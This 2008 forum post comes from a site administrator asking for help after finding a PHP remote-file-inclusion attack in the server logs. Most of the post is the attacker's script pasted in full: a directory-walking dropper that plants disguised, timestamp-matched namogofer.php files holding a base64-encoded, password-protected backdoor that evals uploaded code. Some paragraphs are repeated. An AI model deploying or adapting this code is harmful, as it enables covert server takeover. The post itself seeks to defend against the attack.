namogofer.php hacking attempt
Posted: Mon Mar 10, 2008 4:30 pm
I have noticed this hacking attempt at one of our websites. It gives a weird error in the log (about 26k lines in 10 seconds) similar to this:
[client 196.28.230.50] [Time: Mon Mar 10 2008 15:50:38] PHP Notice: Undefined variable: CURFILE in http://www.elettrodataservice.it/foto_a ... aca/a/.php on line 101\n
What this seems to do is hit the website then execute the script at this address. I have gone and manually denied anything from this IP but it appears it spreads based on other sites. The code this is available at this link is below.
Is there anything that you may have come across to best lock this down to prevent these attacks? It seems it tries to create these namogofer files and write them to execute something remotely. It can only write to stuff outside the web tree, so PHP isn't executable there without the command line, but I would like to secure the site as best as possible to prevent anything from going wrong because of this.
Checking other logs, it appears to be doing a post to root directories ex. /var /usr etc.
[client 196.28.230.50] [Time: Mon Mar 10 2008 15:50:38] PHP Notice: Undefined variable: CURFILE in http://www.elettrodataservice.it/foto_a ... aca/a/.php on line 101\n
What this seems to do is hit the website then execute the script at this address. I have gone and manually denied anything from this IP but it appears it spreads based on other sites. The code this is available at this link is below.
Code: Select all
error_reporting(1);
global $HTTP_SERVER_VARS;
$START = time();
$WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);
function my_fwrite($f,$data) {
global $CURFILE;
$file_mtime = @filemtime($f);
$file_atime = @fileatime($f);
$dir_mtime = @filemtime(@dirname($f));
$dir_atime = @fileatime(@dirname($f));
if ($file_h = @fopen($f,"wb")){
@fwrite($file_h,$data);
@fclose($file_h);
if ($file_mtime){
@touch($f,$file_mtime,$file_atime);
}elseif(@filemtime($CURFILE)){
@chmod($f,@fileperms($CURFILE));
@touch($f,@filemtime($CURFILE),@fileatime($CURFILE));
@chgrp($f,@filegroup($CURFILE));
@chown($f,@fileowner($CURFILE));
};
if ($dir_mtime)
@touch(@dirname($f),$dir_mtime,$dir_atime);
return $f;
}else{
return '';
};
};
function ext($f){
return substr($f, strrpos($f, ".") + 1);
};
function walkdir($p,$func='_walkdir',$l=0){
global $START;
global $WD_TIMEOUT;
global $FL;
$func_f = "{$func}_f";
$func_d = "{$func}_d";
$func_s = "{$func}_s";
$func_e = "{$func}_e";
if ($dh = @opendir("$p")){
if (function_exists($func_s)) {
if ($func_s($p,$l))
return 1;
};
while ($f = @readdir($dh)){
if (time() - $START >= $WD_TIMEOUT[$l] )
break;
if ($f == '.' || $f == '..' )
continue;
if (@is_dir ("$p$f/") )
walkdir("$p$f/",$func,$l+1);
if (@is_dir ("$p$f/") && function_exists($func_d))
$func_d("$p$f/",$l);
if (@is_file("$p$f" ) && function_exists($func_f))
$func_f("$p$f" ,$l);
};
closedir($dh);
if (function_exists($func_e))
$func_e($p,$l);
};
};
function r_cut($p){
global $R;
return substr($p,strlen($R));
};
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("testdata_$t"));
};
$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
$FN = "namogofer.$fe";
function _walkdir_s($d,$l) {
global $FCNT;
$FCNT = array('fn' => '','dir' => 0,'file' => 0,'simtype' => 0);
};
function _walkdir_d($d,$l) {
global $FCNT;
$FCNT['dir' ]++;
};
function _walkdir_f($f,$l) { global $FCNT; $FCNT['file']++;
if (ext($f) == ext($CURFILE)) $FCNT['simtype']++; };
function _walkdir_e($d,$l) {
global $C,$FCNT,$FN;
if ($C[$l]<7){
if (my_fwrite("$d$FN",str_repeat("\n",100).str_repeat(' ',150).base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDEpO2dsb2JhbCAkSFRUUF9TRVJWRVJfVkFSUzsgZnVuY3Rpb24gc2F5KCR0KSB7IGVjaG8gIiR0XG4iOyB9OyBmdW5jdGlvbiB0ZXN0ZGF0YSgkdCkgeyBzYXkobWQ1KCJ0ZXN0ZGF0YV8kdCIpKTsgfTsgZWNobyAiPHByZT4iOyB0ZXN0ZGF0YSgnc3RhcnQnKTsgaWYgKG1kNSgkX1BPU1RbInAiXSk9PSJhYWNlOTk0MjhjNTBkYmU5NjVhY2M5M2YzZjI3NWNkMyIpeyBpZiAoJGNvZGUgPSBAZnJlYWQoQGZvcGVuKCRIVFRQX1BPU1RfRklMRVNbImYiXVsidG1wX25hbWUiXSwicmIiKSwkSFRUUF9QT1NUX0ZJTEVTWyJmIl1bInNpemUiXSkpeyBldmFsKCRjb2RlKTsgfWVsc2V7IHRlc3RkYXRhKCdmJyk7IH07IH1lbHNleyB0ZXN0ZGF0YSgncGFzcycpOyB9OyB0ZXN0ZGF0YSgnZW5kJyk7IGVjaG8gIjwvcHJlPiI7ID8+').str_repeat(' ',150)."\n".str_repeat("\n",100))){
$C[$l]++;
$FCNT['fn'] = r_cut("$d$FN");
say(implode("\t",$FCNT));
};
};
};
walkdir("$R/");
testdata('end');
echo "</pre>";
Checking other logs, it appears to be doing a post to root directories ex. /var /usr etc.